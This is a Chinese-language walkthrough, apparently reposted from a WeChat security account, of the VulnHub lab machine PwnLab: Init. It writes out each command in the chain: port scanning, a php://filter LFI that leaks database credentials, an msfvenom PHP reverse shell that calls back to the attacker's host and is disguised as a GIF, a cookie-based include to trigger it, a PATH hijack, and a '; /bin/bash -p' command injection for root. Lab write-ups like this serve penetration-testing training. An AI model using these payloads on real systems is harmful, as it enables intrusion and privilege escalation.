OSCP难度靶机之PwnLab

admin

102075
文章

87
评论

2022年5月10日22:30:34评论89 views字数 2352阅读7分50秒阅读模式

虚拟机信息

虚拟机下载地址：

https://www.vulnhub.com/entry/pwnlab-init,158/

虚拟机简介：这个 CTF 的目的是获取root并读取de标志

目标：/root/flag.txt

级别：初级

1、主机探测

1、通过netdiscover检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之PwnLab

2、服务探测

1、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.139

查看开放80、111、3306、53614端口

OSCP难度靶机之PwnLab

3、渗透测试

3.1 WEB渗透

1.访问站点进行测试

OSCP难度靶机之PwnLab

2.网站测试

nikto -host http://192.168.207.139

OSCP难度靶机之PwnLab

3.LFI文件包含

查看网页包含login页面，但测试未成功

OSCP难度靶机之PwnLab

测试使用php参数进行包含config.php

http://192.168.207.139/?page=php://filter/convert.base64-encode/resource=config

OSCP难度靶机之PwnLab

4.解码base64

echo  PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 -d

获取到数据库的用户名和密码信息

OSCP难度靶机之PwnLab

5.进入数据库查看

mysql -u root -h 192.168.207.139 -pH4u%QJ_H99 
show databases;
use Users;
select * from users;

OSCP难度靶机之PwnLab

获取到登录用户名和密码

OSCP难度靶机之PwnLab

6.以kent用户登录

解密用户密码，并登录账号

OSCP难度靶机之PwnLab

7.生成反弹shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.207.130 LPORT=4444 -f raw > shell.php

OSCP难度靶机之PwnLab

8.使用burp进行上传

修改文件后缀为GIF，并且在请求内容中添加GIF87a

OSCP难度靶机之PwnLab

并获取到图片上传位置

OSCP难度靶机之PwnLab

9.执行图片马

由于无法操作图片马，查看index页面配置

echo  PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4= | base64 -d

lang添加了一个 ' ' cookie 来加载 ' en.lang.php' 文件

OSCP难度靶机之PwnLab

10.创建MSF监听服务

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.207.130
run

OSCP难度靶机之PwnLab

11.配置cookie

添加cookie内容，名称为lang，内容为图片地址：../upload/b5e9b4f86ce43ca65bd79c894c4a924c.gif

OSCP难度靶机之PwnLab

刷新页面获取到反弹shell连接

OSCP难度靶机之PwnLab

3.2 系统渗透

1.切换用户

由于已经有三个用户的密码信息，切换到用户进行测试，登录kane用户

python -c 'import pty; pty.spawn("/bin/bash")'
su - kane

发现有一个可执行文件属于mike用户

OSCP难度靶机之PwnLab

2.执行文件查看

./msgmike

OSCP难度靶机之PwnLab

3.修改环境变量信息

echo "/bin/bash" > /tmp/cat
chmod +x /tmp/cat
PATH=/tmp:$PATH
./msgmike

已经切换为mike用户

OSCP难度靶机之PwnLab

4.进入mike用户

cd /home/mike

查看文件内容为可执行方式

OSCP难度靶机之PwnLab

5.查看文件执行方式

./msg2root

输入内容会有相关输出

OSCP难度靶机之PwnLab

6.账号提权

./msg2root
123; /bin/bash -p

OSCP难度靶机之PwnLab

7.获取flag信息

cd /root
more flag.txt

OSCP难度靶机之PwnLab

原文始发于微信公众号（安全孺子牛）：OSCP难度靶机之PwnLab

左青龙
微信扫一扫

右白虎
微信扫一扫

OSCP难度靶机之PwnLab

虚拟机信息

1、主机探测

1、通过netdiscover检测主机IP地址

2、服务探测

1、通过nmap进行端口扫描

3、渗透测试

3.1 WEB渗透

1.访问站点进行测试

2.网站测试

3.LFI文件包含

4.解码base64

5.进入数据库查看

6.以kent用户登录

7.生成反弹shell

8.使用burp进行上传

9.执行图片马

10.创建MSF监听服务

11.配置cookie

3.2 系统渗透

1.切换用户

2.执行文件查看

3.修改环境变量信息

4.进入mike用户

5.查看文件执行方式

6.账号提权

7.获取flag信息

美国APT供应链打穿伊朗物理隔离的核工厂案例分析（第2篇）

实战攻防:记一次市级hw

HTB-Rebound（Insane）

漏洞挖掘 | 记一个信息泄露到RCE

【翻译】一个关于Synack红队目标的有趣的RCE !(019)

Linux系统APT管理器详解

e-message管理页面 | 文件读取

小黑粉培养计划-Kali Linux基础(2)

一次收获颇丰的Google漏洞挖掘旅程

经验分享 | 如何从蓝初小白到蓝中猴子（一）

发表评论